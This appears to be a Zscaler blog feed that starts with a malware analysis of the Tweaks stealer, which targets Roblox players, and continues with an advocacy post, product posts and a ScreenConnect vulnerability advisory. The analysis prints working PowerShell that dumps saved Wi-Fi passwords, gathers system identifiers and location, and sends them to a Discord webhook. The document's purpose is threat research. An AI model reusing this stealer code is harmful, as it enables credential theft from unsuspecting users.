it appears to be fulfilling its intended purpose. Figure 2 below shows both the paid and free version of Tweaks on the Discord channel.Figure 2: An example of the Discord group advertising FPS optimization files to distribute Tweaks malware.Case Study 1After joining the Discord group, Roblox gamers are directed to download a malicious BAT file from a Mediafire link, leading to a malware infection.Once the malware is executed, the BAT file presents users with the Tweaks menu interface, while simultaneously stealing their information in the background. The stolen data is then sent via Discord webhooks to an attacker-controlled server.The figure below illustrates the Tweaks attack chain.Figure 3: Illustrates the Tweaks attack chain involving a Discord group supplying a BAT file.Case Study 2Upon further investigation, we discovered that Tweaks was being sold on Discord. Two versions are available for purchase: the Beta Menu and the Paid Menu.The malware author converted the BAT file into an EXE file and then inserted the EXE file into a password-protected ZIP archive. This new iteration employs the same stealing capabilities as the BAT file discussed in Case Study 1. The figure below illustrates the Tweaks attack chain for Case Study 2. Figure 4: This diagram illustrates the Tweaks attack chain involving a Discord group supplying an EXE file inside of a ZIP archive.CapabilitiesThe Tweaks malware can steal the following data:User’s Wi-Fi profiles and passwordsUUID and usernamesUser locationIP address and timeSystem informationRoblox ID and in-game currency informationTechnical AnalysisThe following analysis covers the technical characteristics of Case Study 1 and Case Study 2 for Tweaks.Case Study 11. BAT files establish webhooks: To start, once the user downloads the BAT file and executes it, the malware establishes the necessary webhook URLs using the Powershell commands below:"$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^ "Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"The file embeds the pilfered data within the webhooks, ensuring its transmission to the attackers.2. Wi-Fi profile and password theft: The malware steals Wi-Fi profiles and passwords with the Powershell command below: “$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' | ForEach-Object { $_.ToString().Split(':')[1].Trim() }; if ($pwd) { Write-Output ('SSID: ' + $ssid + ', Password: ' + $pwd) } else { Write-Output 'SSID: ' + $ssid + ', Password: NO PASSWORDS FOUND' } });”The code sample above is also shown in Figure 5 below.Figure 5: Tweaks code showing the webhook setup and Wi-Fi profiles/password theft.3. Using WMI to harvest system information: The malware leverages Windows Management Instrumentation (WMI) to collect UUIDs and usernames along with the user's location including the following fields: country, region, city, and approximate location. The Powershell code looks like this:"$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^ "$pcUsername = $env:USERNAME;" "$ipInfo = Invoke-RestMethod -Uri 'http://ipinfo.io/json';" ^ "$country = $ipInfo.country;" ^ "$region = $ipInfo.region;" ^ "$city = $ipInfo.city;" ^ "$location = $ipInfo.loc;"The code sample above, along with the user’s location and username, are shown in Figure 6 below.Figure 6: Tweaks code showing the theft of UUID, user name, and the user’s location.4. Additional data theft: In addition, the malware collects IP information like private and public IP addresses, the current time, system information, Roblox ID, and currency information.The former values are collected using the following Powershell code:"$publicIp = (Invoke-RestMethod -Uri 'https://api64.ipify.org?format=json').ip;" ^ "$privateIp = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString;" ^ "$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';" ^ "$description = 'Public IP: ' + $publicIp + ' - Private IP: ' + $privateIp + ' - Current Time: ' + $currentTime;"The latter values are collected with the code shown in Figure 7 below.Figure 7: Tweaks code showing the collection of system information, Roblox ID, and in-game currency details.Case Study 2In Case Study 2, when the user follows the link mentioned in the Discord group, a ZIP archive is downloaded, which contains an EXE file. Once the user executes the EXE file, it displays the Tweaks menu interface similar to Case Study 1.The malware creates a folder in the Temp directory, C:\Users\<user_name>\AppData\Local\Temp\F9B9.tmp, with a random name and creates a BAT file in that directory as shown in the screenshot below.Figure 8: The process tree of the Tweaks EXE file.The source code of the dropped BAT file is similar to the BAT file used in Case Study 1 and its functionality is the same.ConclusionAttackers are leveraging popular community platforms, like YouTube and Discord, to distribute Tweaks malware and steal sensitive data. They capitalize on the legitimate reputation of YouTube and Discord communities to trick victims into inadvertently downloading (and in some cases paying) for their own malware infections. To mitigate these risks, Roblox users (and all gamers) should prioritize using legitimate apps from reputable and secure sources, thereby avoiding unknown or unverified application origins. By adhering to these precautions, gamers can enhance their cybersecurity defenses and protect themselves from potential malware threats.Zscaler Sandbox CoverageDuring our investigation of this campaign, the Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Because of the sandbox analysis, threat scores and specific MITRE ATT&CK techniques triggered were identified. Figure 9: Sandbox reportWin32.PWS.TWEAKS BAT.PWS.TWEAKSMITRE ATT&CK TechniquesIDTechnique NameT1566PhishingT1082System Information DiscoveryT1064ScriptingT1010Application Windows DiscoveryT1047Windows Management InstrumentationT1016.002Wi-Fi DiscoveryT1016System Network Configuration DiscoveryT1059Command and Scripting InterpreterT1018Remote System DiscoveryT1562Disable or Modify ToolsIndicators Of Compromise (IOCs)MD5File Typee35864892846be3462139f9534d5ddb5EXE0e8d32259b06ab01cd04587b1ae5d0c1BAT Webhook URLhttps://discord[.]com/api/webhooks/1193562861071511683/Y3e960iiIYKeT-2hq8c0VDuprdKTD3u5F1f0AKfPQnQde8CoXnK2HzVoVGb6mBgXTsc6https://discordapp[.]com/api/webhooks/1197341553404956752/xoPYo_fCPQGLsUIBrreFz05R9JuX_K4L96ResReZ7oLtj1za6QSYlCuMnTB8raMpVqCw YouTube Channelshttps://www.youtube[.]com/@cartistweaks/videoshttps://www.youtube[.]com/@fraidtweaks Tue, 12 Mar 2024 14:52:56 -0700 Preet Kamal https://www.zscaler.com/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discord https://www.zscaler.com/blogs/zscaler-life/help-build-more-inclusive-future-develop-yourself An organization's success comes down to its people, and fostering diversity in the workforce amplifies a business's ability to navigate complex challenges. Women bring unique skills and perspectives that contribute significantly to a company's effectiveness. From innovation and effective communication to adept problem-solving and inspiring leadership, women enrich the professional landscape with a diverse array of talents. I am proud to be the global president of WIZE (Women in Zscaler Engage), Zscaler’s women-led employee resource group. This week we kicked off our month-long celebration for Women’s History Month and International Women’s Day. We are continuing to engage in tough conversations both regionally and globally with our allies to elevate women’s voices. There is still a great amount of work that must be done both today and for future generations of women and girls. As Kavitha Mariappan, EVP, Customer Experience & Transformation and WIZE executive sponsor said in her opening remarks at our IWD celebration, “You all are role models to so many in our industry. This is important. Studies show Gen Z girls are 20 percent more likely than boys to say they won’t pursue a STEM career because they don’t feel they would be good at it.” As a woman in tech and mother of five, stats like this push me to expose girls to the importance of STEM and encourage our allies to use their voices. We need everyone involved in this effort! Dr. Gena Cox joined us for our virtual celebrations to share her valuable insights on spearheading inclusion within the organization and the significance of respect, with an emphasis on those who are underrepresented. Dr. Cox shared her model on how everyone should feel valued, seen and heard. As I reflected on Dr. Cox’s keynote, I thought about ways I can, and should, be modeling respect in my professional and personal life. What could I do or say to impact someone’s day, life, or career? We all have a voice and platform, we just need to be shown how and when to use it. I am standing up for women’s rights, for equality in the tech industry, and as a mother I will always stand behind my children and seek to positively impact their future. I believe that, in 2024, we are another step closer to creating a more inclusive environment for future generations, and each individual act matters. This doesn’t just mean in our professional careers, it means taking it into our personal lives. I am invested in myself. I am dedicated to my personal growth and self-improvement to create the best version of myself. I am invested in my children and my family. As a working mother, I am continuously learning to skillfully balance the demands of my professional career while being active in my childrens’ lives. I am committed to showing each of them that they are valued, heard, seen, and loved. I am invested in my community. I am passionate about community engagement in my personal and professional lives. I will continue to empower others and reinforce among allies the importance of collaboration through education while leading by example. Zscaler’s WIZE International Women’s Day celebration also recognized 28 women from around the world with a WIZE Award for their commitment and dedication to making an inclusive workplace through mentorship, community engagement, leadership, going the extra mile, and serving our customers. Thank you to all of our winners and our greater WIZE community for your continued support and efforts to create a safe environment where we can bring our authentic self to work. We hope you join us in celebrating Women’s History Month and International Women’s Day 2024! To learn more about the amazing women of Zscaler, watch this video and explore the content below: What to Read Next: This International Women’s Day, let’s pull up a chair for all of our women colleagues The ascendency of inclusion: A conversation with Dr. Gena Cox Celebrating Women at Zscaler: WIZE Woman of Impact in APJ: Sandra Wang WIZE Women of Impact: Wendy Bartijn Sun, 10 Mar 2024 17:24:56 -0700 Julia Cummings https://www.zscaler.com/blogs/zscaler-life/help-build-more-inclusive-future-develop-yourself https://www.zscaler.com/blogs/product-insights/outpace-attackers-ai-powered-advanced-threat-protection Securing access to the internet and applications for any user, device, or workload connecting from anywhere in the world means preventing attacks before they start. Zscaler Advanced Threat Protection (ATP) is a suite of AI-powered cyberthreat and data protection services included with all editions of Zscaler Internet Access (ZIA) that provides always-on defense against complex cyberattacks, including malware, phishing campaigns, and more. Leveraging real-time AI risk assessments informed by threat intelligence that Zscaler harvests from more than 500 trillion daily signals, ATP stops advanced phishing, command-and-control (C2) attacks, and other tactics before they can impact your organization. In aggregate, Zscaler operates the largest global security cloud across 150 data centers and blocks more than 9 billion threats per day. Additionally, our platform consumes more than 40 industry threat intelligence feeds for further analysis and threat prevention. With ATP you can: Allow, block, isolate, or alert on web pages based on AI-determined risk scores Block malicious content, files, botnet, and C2 traffic Stop phishing, spyware, cryptomining, adware, and webspam Prevent data loss via IRC or SSH tunneling and C2 traffic Block cross-site scripting (XSS) and P2P communications to prevent malicious code injection and file downloads To provide this protection, Zscaler inspects traffic—encrypted or unencrypted—to block attackers’ attempts to compromise your organization. Zscaler ThreatLabz found in 2023 that 86% of threats are now delivered over encrypted channels, underscoring the need to thoroughly inspect all traffic. Enabling protection against these threats takes just a few minutes in ATP in the Zscaler Internet Access management console. This blog will help you better understand the attack tactics ATP prevents on a continuous basis. We recommend you select “Block” for all policy options and set the "Suspicious Content Protection" risk tolerance setting to "Low" in the ATP configuration panel of the ZIA management console. Prevent web content from compromising your environmentThreat actors routinely embed malicious scripts and applications on legitimate websites they’ve hacked. ATP policy protects your traffic from fraud, unauthorized communication, and other malicious objects and scripts. To bolster your organization's web security, the Zscaler ATP service identifies these objects and prevents them from downloading unwanted files or scripts onto an endpoint device via the user’s browser. Using multidimensional machine learning models, the ZIA service applies inline AI analysis to examine both a web page URL and its domain to create Page Risk and Domain Risk scores. Given the magnitude of Zscaler’s dataset and threat intelligence inputs, risk scoring is not dependent on specific indicators of compromise (IOCs) or patterns. Using AI/ML to analyze web pages reveals malicious content including injected scripts, vulnerable ActiveX, and zero-pixel iFrames. The Domain Risk score results from analysis of the contextual data of a domain, including hosting country, domain age, and links to high-risk top-level domains. The Page Risk and Domain Risk scores are then combined to produce a single Page Risk score in real time, which is displayed on a sliding scale. This risk score is then evaluated against the Page Risk value you set in the ATP configuration setting (as shown below). Zscaler will block users from accessing all web pages with a Page Risk score higher than the value you set. You can set the Page Risk value based on your organization’s risk tolerance. Disrupt automated botnet communicationA botnet is a group of internet-connected devices, each of which runs one or more bots, or small programs, that are collectively used for service disruption, financial or sensitive information theft via distributed denial-of-service (DDoS) attacks, spam campaigns, or brute-forcing systems. The threat actor controls the botnet using command-and-control software. Command & Control Servers An attacker uses a C2 server to send instructions to systems compromised by malware and retrieve stolen data from victim devices. Enabling this ATP policy blocks communication to known C2 servers, which is key to preventing attackers from communicating with malicious software deployed on victims’ devices. Command & Control Traffic This refers to botnet traffic that sends or receives commands to and from unknown servers. The Zscaler service examines the content of requests and responses to unknown servers. Enabling this control in the ATP configuration blocks this traffic. Block malicious downloads and browser exploits Malicious Content & Sites Websites that attempt to download dangerous content to the user's browser upon loading a page introduce considerable risk: this content can be downloaded silently, without the user's knowledge or awareness. Malicious content could include exploit kits, compromised websites, and malicious advertising. Vulnerable ActiveX Controls An ActiveX control is a software program for Internet Explorer, often referred to as an add-on, that performs specific functionality after a web page loads. Threat actors can use ActiveX controls to masquerade as legitimate software when, in reality, they use them to infiltrate an organization’s environment. Browser Exploits Known web browser vulnerabilities can be exploited, including exploits targeting Internet Explorer and Adobe Flash. Despite Adobe sunsetting the browser-based add-on in January 2021, Flash components are still found embedded in systems, some of which may be critical for infrastructure or data center operations. Foil digital fraud and cryptomining attempts AI-Powered Phishing Detection Phishing is becoming harder to stop with new tactics, including phishing kits sold on the black market—these kits enable attackers to spin up phishing campaigns and malicious web pages that can be updated in a matter of hours. Phishing pages trick users into submitting their credentials, which attackers use in turn to compromise victims’ accounts. Phishing attacks remain problematic because even unsophisticated criminals can simply buy kits on the dark web. Threat actors can also update phishing pages more quickly than most security solutions meant to detect and prevent phishing can keep up with. But with Zscaler ATP, you can prevent compromises from patient zero phishing pages inline with advanced AI-based detection. Known Phishing Sites Phishing websites mimic legitimate banking and financial sites to fool users into thinking they can safely submit account numbers, passwords, and other personal information, which criminals can then use to steal their money. Enable this policy to prevent users from visiting known phishing sites. Suspected Phishing Sites Zscaler can inspect a website’s content for indications that it is a phishing site, and then use AI to stop phishing attack vectors. As part of a highly commoditized attack method, phishing pages can have a lifespan of a few hours, yet most phishing URL feeds lag 24 hours behind—that gap can only be addressed by a capability able to stop both new and unknown phishing attacks. Spyware Callback Adware and spyware sites gather users’ information without their knowledge and sell it to advertisers or criminals. When “Spyware Callback” blocking is enabled, Zscaler ATP prevents spyware from calling home and transmitting sensitive user data such as address, date of birth, and credit card information. Cryptomining Most organizations block cryptomining traffic to prevent cryptojacking, where malicious scripts or programs secretly use a device to mine cryptocurrency—but this malware also consumes resources and impacts performance of infected machines. Enabling “Block” in ATP’s configuration settings prevents cryptomining entering your environment via user devices. Known Adware & Spyware Sites Threat actors stage legitimate-looking websites designed to distribute potentially unwanted applications (PUA). These web requests can be denied based on the reputation of the destination IP or domain name. Choose “Block” in ATP policy configuration to prevent your users from accessing known adware and spyware sites. Shut down unauthorized communication Unauthorized communication refers to the tactics and tools attackers use to bypass firewalls and proxies, such as IRC tunneling applications and "anonymizer" websites. IRC Tunneling Internet Relay Chat (IRC) protocol was created in 1988 to allow real-time text messaging between internet-connected computers. Primarily used in chat rooms (or “channels”), the IRC protocol also supports data transfer as well as server- and client-side commands. While most firewalls block the IRC protocol, they may allow SSH connections. Hackers take advantage of this to tunnel their IRC connections via SSH, bypass firewalls, and exfiltrate data. Enabling this policy option will block IRC traffic from being tunneled over HTTP/S. SSH Tunneling SSH tunneling enables sending data with an existing SSH connection, with the traffic tunneled over HTTP/S. While there are legitimate uses for SSH tunnels, bad actors can use them as an evasion technique to exfiltrate data. Zscaler ATP can block this activity. Anonymizers Attackers use anonymizer applications to obscure the destination and content they want to access. Anonymizers enable the user to bypass policies that control access to websites and internet resources. Enabling this policy option blocks access to anonymizer sites. Block cross-site scripting (XSS) and other malicious web requestsCross-site scripting (XSS) is an attack tactic wherein bad actors inject malicious scripts into otherwise trusted websites. XSS attacks occur when a threat actor uses a web app to send malicious code, usually in the form of a client-side script, to a different end user. Cookie Stealing Cookie stealing, or session hijacking, occurs when bad actors harvest session cookies from users’ web browsers so they can gain access to sensitive data including valuable personal and financial details they in turn sell on the dark web or use for identity theft. Attackers also use cookies to impersonate a user and log in to their social media accounts. Potentially Malicious Requests Variants of XSS requests enable attackers to exploit vulnerabilities in a web application so they can inject malicious code into a website. When other users load a page from the target web server in their browser, the malicious code executes, expanding the attack exponentially. Prevent compromise via peer-to-peer file sharing P2P programs enable users to easily share files with each other over the internet. While there are legitimate uses of P2P file sharing, these tools are also frequently used to illegally acquire copyrighted or protected content—and the same content files can contain malware embedded within legitimate data or programs. BitTorrent The Zscaler service can block the usage of BitTorrent, a communication protocol for decentralized file transfers supported by various client applications. While its usage was once pervasive, global torrent traffic has decreased from a high of 35% in the mid-2000s to just 3% of all global internet traffic in 2022. Tor Tor is a P2P anonymizer protocol that obscures the destination and content accessed by a user, enabling them to bypass policies controlling what websites or internet resources they can access. With Zscaler ATP, you can block the usage of the Tor protocol. Avoid VOIP bandwidth overutilizationWhile convenient for online meetings, video conferencing tools can be bandwidth-intensive. They may also be used to transfer files or other sensitive data. Depending on both your organization's risk tolerance level and overall network performance, you may want to curtail employee or contractor use of Google Hangouts. Google Hangouts While VOIP application usage may be encouraged for cost savings over traditional landline-based communications, it’s often associated with high bandwidth usage. Google Hangouts (a.k.a. Google Meet) requires a single video call participant to meet a 3.2 Mbps outbound bandwidth threshold. Inbound bandwidth required starts at 2.6Mbps for two users and expands with additional participants. In Zscaler ATP, you can block Google Hangout usage to conserve bandwidth for other business-critical applications. Comprehensive, always-on, real-time protection Clearly, there’s a wide swath of protection modern organizations need to fortify their security posture on an ongoing basis. Zscaler Advanced Threat Protection delivers always-on protection against ransomware, zero-day threats, and unknown malware as part of the most comprehensive suite of security capabilities, powered by the world's largest security cloud—all at no extra cost to ZIA customers. ATP filters and blocks threats directed at ZIA customers and, in combination with Zscaler Firewall and Zscaler Sandbox, provides superior threat prevention thanks to: A fully integrated suite of AI-powered security services that closes security gaps and reduces risks left by other vendors’ security tools. Zscaler Sandbox detects zero-day malware for future-proof protection while Zscaler Firewall provides IPS and DNS control and filtering of the latest non-web threats. Real-time threat visibility to stay several steps ahead of threat actors. You can’t wait for another vendor’s tool to finish scheduled scans to determine if you’re secure—that puts your organization at risk. Effective advanced threat protection from Zscaler monitors all your traffic at all times. Centralized context and correlation that provides the full picture for faster threat detection and prevention. Real-time, predictive cybersecurity measures powered by advanced AI continuously give your IT or security team the ability to outpace attackers. The ability to inspect 100% of traffic with Zscaler’s security cloud distributed across 150 points of presence worldwide. Operating as a cloud-native proxy, the Zscaler Zero Trust Exchange ensures that every packet from every user, on or off-network, is fully inspected with unlimited capacity—including all TLS/SSL encrypted traffic. Learn more about how Zscaler prevents encrypted attacks and best practices to stop encrypted threats by securing TLS/SSL traffic: download a copy of the Zscaler ThreatLabz 2023 State of Encrypted Attacks Report. Mon, 11 Mar 2024 07:00:01 -0700 Brendon Macaraeg https://www.zscaler.com/blogs/product-insights/outpace-attackers-ai-powered-advanced-threat-protection https://www.zscaler.com/blogs/security-research/multiple-vulnerabilities-found-connectwise-screenconnect IntroductionOn February 19, 2024, ConnectWise released an advisory disclosing critical vulnerabilities impacting ScreenConnect Remote Monitoring and Management (RMM) software. The first vulnerability, tracked as CVE-2024-1709, allows threat actors to bypass authentication and exploit a second vulnerability, CVE-2024-1708. The second vulnerability is a path traversal flaw that enables attackers to upload a malicious file, potentially leading to Remote Code Execution (RCE) on affected versions of ScreenConnect instances. The technical details of this vulnerability underscore its easy exploitability, utilizing common tactics, techniques, and procedures (TTPs) that could lead to data exfiltration and lateral movement across compromised instances. RecommendationsZscaler ThreatLabz strongly recommends on-premises users of ConnectWise ScreenConnect software to promptly upgrade to the latest version, which has crucial fixes to mitigate the vulnerabilities identified as CVE-2024-1709 and CVE-2024-1708. Affected VersionsThe following versions of ConnectWise ScreenConnect are affected by the vulnerabilities disclosed and should be updated immediately: ScreenConnect 23.9.7 and prior BackgroundConnectWise ScreenConnect enables users to manage, connect, and access systems remotely. The remote access solution is available for on-prem and cloud architectures. ConnectWise’s advisory prompted the Cybersecurity & Infrastructure Security Agency (CISA) to add CVE-2024-1709 to their Known Exploited Vulnerabilities Catalog. CVE-2024-1709 earned a critical CVSS score of 10.0, while CVE-2024-1708 received a score of 8.4. CVE-2024-1709 allows a remote attacker to gain access to systems with admin privileges. Once inside the compromised system, the attacker leverages CVE-2024-1708 to upload malicious files to the compromised system and potentially achieve RCE. An attacker can exploit these vulnerabilities to: Access, upload, or modify important files Steal sensitive information and disrupt critical services Move laterally on the breached network How It WorksThe attack sequence begins by sending a malformed HTTP request to the vulnerable ScreenConnect instance. Specifically, this means appending any character to the /SetupWizard.aspx URL (i.e., /SetupWizard.aspx<something>) to gain unauthenticated access to the /SetupWizard.aspx page. The /SetupWizard.aspx page allows the attacker to create a new user account with administrator privileges, even on a pre-configured instance, without requiring any authentication. This exploit is possible due to a flaw in the SetupWizard.aspx file, responsible for the initial administrator setup and license validation on the instance. Once inside the system, the attacker uploads a malicious ASHX ScreenConnect extension, packaged in a ZIP archive, to achieve RCE and later obtain a remote web shell. The attack sequence is shown in Figure 1. Figure 1: A diagram illustrating how an attacker targets a vulnerable ScreenConnect instance. Exploitation Steps1. Malformed HTTP Request: The attacker launches the attack by sending a malformed HTTP request to the vulnerable ScreenConnect instance as shown below. Figure 2: An example of a malformed HTTP request targeting CVE-2024-1709. The figure below shows CVE-2024-1709 exploitation via a 302 redirect to the /SetupWizard.aspx page. Figure 3: Exploitation of CVE-2024-1709. 2. Arbitrary Admin Account Creation: Upon receiving the malicious request, the ScreenConnect instance processes the request and redirects to the /SetupWizard.aspx page, where the attacker can create an administrator account as shown in Figure 4. Figure 4: The ScreenConnect page where the attacker can fraudulently create an administrator user account. The figure below includes XML showing that the attacker was able to successfully create an administrator user account. Figure 5: ScreenConnect\App_Data\User.xml shows evidence of the attacker-created administrator user account. 3. Malicious Payload Delivery: The attacker uploads a malicious ScreenConnect extension (shown in Figure 6) wrapped in a ZIP archive to the vulnerable instance. This ZIP archive contains an ASHX file designed to exploit CVE-2024-1708 and facilitate RCE on the vulnerable system. Figure 6: A POST transaction depicting the installation of a malicious extension on a ScreenConnect Instance. 4. Malicious Code Execution: Following the successful upload of the malicious ScreenConnect extension (.ashx file), the vulnerable system executes the code contained within the payload as shown in Figure 7. This execution grants the attacker unauthorized access and control over the compromised system, enabling further exploitation and privilege escalation. Figure 7: The malicious ZIP archive uploaded by the attacker containing a Base64-encoded command invoking cmd.exe for remote code execution. According to reports, the post-exploitation phase included the deployment of ToddlerShark malware, leveraging the second vulnerability. ToddlerShark malware demonstrates polymorphic behavior and utilizes legitimate Microsoft binaries and alternate data streams. It bears a striking resemblance to BabyShark malware, which has been associated with the North Korean APT group known as Kimsuky. Zscaler Best PracticesSafeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with advanced Deception turned on. Route all server traffic through Zscaler Private Access™ with the application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers. Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control (C2) domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware. Extend command-and-control (C2) protection to all ports and protocols with Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware. Use Zscaler Cloud Sandbox™ to prevent unknown malware delivered as art of a second-stage payload. Inspect all TLS/SSL traffic and restrict traffic to critical infrastructure from an allowed list of known-good destinations. ConclusionTo ensure security, ConnectWise ScreenConnect users should update their on-prem deployments to version 23.9.8 or above promptly. Cloud-based deployments, on the other hand, do not require any action as ConnectWise has already applied the necessary patches. Failing to update exposes systems to vulnerabilities such as CVE-2024-1709 and CVE-2024-1708. These vulnerabilities enable threat actors to manipulate server configurations, gain administrator-level privileges, and execute remote code. Indicators of CompromiseConnectWise reported active exploitation of CVE-2024-1709 and released the following Indicators of Compromise (IOCs): 155[.]133[.]5[.]15 155[.]133[.]5[.]14 118[.]69[.]65[.]60 Zscaler CoverageThe Zscaler ThreatLabz team has deployed the following: Zscaler Advanced Threat Protection APP.EXPLOIT.CVE-2024-1708_CVE-2024-1709 Zscaler Private Access AppProtection 6000760 - ConnectWise ScreenConnect SetupModule Authentication Bypass (CVE-2024-1709) For more details, visit the Zscaler Threat Library. Referencesconnectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 Understanding the ConnectWise ScreenConnect CVE-2024-1709 & CVE-2024-1708 | Huntress Blog https://www.bleepingcomputer.com/news/security/connectwise-urges-screenconnect-admins-to-patch-critical-rce-flaw/ Detection Guidance for ConnectWise CWE-288 (huntress.com) https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE Mon, 11 Mar 2024 14:30:19 -0700 Arkaprava Tripathi https://www.zscaler.com/blogs/security-research/multiple-vulnerabilities-found-connectwise-screenconnect https://www.zscaler.com/blogs/product-insights/linkedin-outage-detected-zscaler-digital-experience-zdx At 3:40 p.m. EST on March 6, 2024, Zscaler Digital Experience (ZDX) saw a substantial, unexpected drop in the ZDX score for LinkedIn services around the globe. Upon analysis, we noticed HTTP 503 errors highlighting a LinkedIn outage, with the ZDX heatmap clearly detailing the impact at a global scale. ZDX dashboard indicating widespread LinkedIn outage ZDX enables customers to proactively identify and quickly isolate service issues, giving IT teams confidence in the root cause, reducing mean time to resolve (MTTR) and first response time (MTTD). ZDX dashboard showing LinkedIn global issues ZDX Score highlights LinkedIn outageVisible on the ZDX admin portal dashboard, the ZDX Score represents all users in an organization across all applications, locations, and cities on a scale of 0 to 100, with the low end indicating a poor user experience. Depending on the time period and filters selected in the dashboard, the score will adjust accordingly. The dashboard shows that the ZDX Score for the LinkedIn probes dropped to ZERO during the outage window of approximately 1 hour. From within ZDX, service desk teams can easily see that the service degradation isn’t limited to a single location or user and quickly begin analyzing the root cause. ZDX Score indicating LinkedIn outage and recovery (times in EST) Also in the ZDX dashboard, “Web Probe Metrics” highlight the user impact of reaching LinkedIn applications across a timeline with response times. In this case, the server responded with 503 errors, indicating the server was not ready to handle requests. ZDX Web Probe Metrics indicating 503 errors (times in EST) ZDX can quickly identify the root cause of user experience issues with its new AI-powered root cause analysis capability. This spares IT teams the labor of sifting through fragmented data and troubleshooting, thereby accelerating resolution and keeping employees productive. With a simple click in the ZDX dashboard, you can analyze a score, and ZDX will provide insight into potential issues. As you can see, in the case of this LinkedIn outage, ZDX highlights that the application is impacted while the network itself is fine. ZDX AI-powered root cause analysis indicates the reason for the outage When there’s an application outage, many IT teams turn to the network as the root cause. However, as you can see above, ZDX AI-powered root cause analysis verified that the network transport wasn’t the issue; it was actually at the application level. You can verify this by looking at the CloudPath metrics from the user to the destination. ZDX CloudPath showing full end-to-end data path ZDX CloudPath detailed hops between the nodes With AI-powered analysis and dynamic alerts, IT teams can quickly compare optimal vs. degraded user experiences and set intelligent alerts based on deviations in observed metrics. ZDX allows you to compare two points in time to understand the differences between them. This function determines a good vs. poor user experience, visually highlighting the differences between application, network, and device metrics. The end user comparison during the LinkedIn outage vs. a known good score indicates the ZDX Score difference, highlighting the unexpected performance drop for the end user. ZDX comparison mode identifies the change in user experience According to the LinkedIn status page, the outage was reported at 12:50 PST until 14:05 PST, which correlates to the ZDX data above. However, LinkedIn services started to recover pretty quickly, by 13:40 PST, and LinkedIn reported the issue resolved by 14:05 PST. Source: LinkedIn With ZDX alerting, our customers were proactively notified about end user problems, and incidents were opened automatically with our service desk integration (e.g., ServiceNow) long before users started to report it. From a single dashboard, customers were able to quickly identify this as a LinkedIn issue, not an internal network outage, saving precious IT time. Zscaler Digital Experience successfully detected a LinkedIn outage along with its root cause, giving our customers the confidence that it was not a single location, their networks, or devices, averting critical impact to their business. Try Zscaler Digital Experience today ZDX helps IT teams monitor digital experiences from the end user perspective to optimize performance and rapidly fix offending application, network, and device issues. To see how ZDX can help your organization, please contact us. Thu, 07 Mar 2024 19:14:07 -0800 Rohit Goyal https://www.zscaler.com/blogs/product-insights/linkedin-outage-detected-zscaler-digital-experience-zdx https://www.zscaler.com/blogs/product-insights/positioning-zscaler-private-access-relative-to-vdi-part-2 In the first part of this VDI blog series, we discussed the two major use cases of access granularity and traffic inspection and how Zscaler can support these with the help of the Zero Trust Exchange platform. In this blog, we will focus on more use cases and ways to integrate Zscaler as complementary solution to VDI to cover security related aspects. Data residency restriction This use case deserves a deeper investigation, because although we can say that it is supported, there could be specific instances in which Zscaler cannot replace the VDI environment. Zscaler Cloud Browser Isolation (CBI) prevents data to leave the corporate boundary. We can define what level of restriction applies to the data exchange between the actual application and the isolated container. The recent introduction of Endpoint DLP capabilities could further help our conversation when stricter security requirements are required. Zscaler Cloud Browser Isolation is inherently non-persistent; the virtual machine is terminated after each session. Now, imagine the scenario of a developer working remotely on a virtual desktop where he has his own environment and data can’t leave the company area. This individual would need a persistent desktop to work, and the user environment shouldn’t be destroyed when he closes the working session. This use case could be challenging for a VDI replacement. This use case could be addressed by leveraging the Private Remote Access (PRA) and RDP. In the above example, an RDP session could be launched toward a machine where the developer can work and log in, where their development environment sits and where communication is local, and data won't leave the company boundary. Obviously, the organisation’s environment must be assessed carefully to validate the pros and cons of the proposed alternative. Traffic localization In this scenario, the goal is to keep the communication local to the data centre due to performance issues. From a Zscaler point of view, the area of potential replacement exists once we validated the possibility to leverage Private Remote Access (PRA) and RDP with the customer, where a remote session is launched toward a machine that interacts locally with the server. Desktop or software license management / reduction The discussion about this scenario under the assumption to keep the VDI environment up and running needs a preamble. ZCC does not support multiple, simultaneous user sessions from a single host operating system. The main problem to address is supporting ZIA and ZPA services on multi-user VDI environments. Zscaler now offers the ability to inspect all ports and protocols for multi-session, non-persistent VDI deployments in the public cloud and on-prem data centers through the use of a VDI agent. Enterprises can apply granular threat and data protection policies per individual user session, enabling enterprises to maintain common security policies across all environments. Multi-user VDI can be hosted on a public cloud (Azure, AWS, etc.) or private data centers (VMWare or KVM, etc.). Cloud/Branch Connector can be used to direct traffic from the VDI users to the Zscaler cloud and extend ZIA and ZPA services to the VDI users. However, Cloud/Branch Connector does not have any user/VM context to the traffic and will enforce a single security policy to all the VDI users. To fix this issue, we leverage a VDI agent, that is a lightweight software package running in the user space of the VDI session. It is responsible for authenticating users, establishing a tunnel to Branch or Cloud Connector (Control and Data) and exchanging user context with the Branch or Cloud Connector (see below diagram). The VDI Agent maintains proprietary, lightweight tunnels (UDP encapsulation) to the local Cloud or Branch Connector. These tunnels carry both user session data in the payload, as well as user context information in the UDP header. These tunnels are stateless, which ensures that - in the event of a Branch or Cloud Connector failure - they can failover to other active appliances. With that said, we have now the possibility to extend Zscaler services to multi-user VDI environments. Legacy app support Although this scenario is becoming more and more niche due to applications and architecture evolution, that’s an area where VDI could help customers. The Zscaler Client Connector supports the latest software version and the two previous versions for each software product. See more details on the Zscaler Help page. At a higher level - digging into why organisations use VDI in the first place is important. Walking through their use cases and applications to explore the scope is important to move customers beyond the assumptions that flow from the 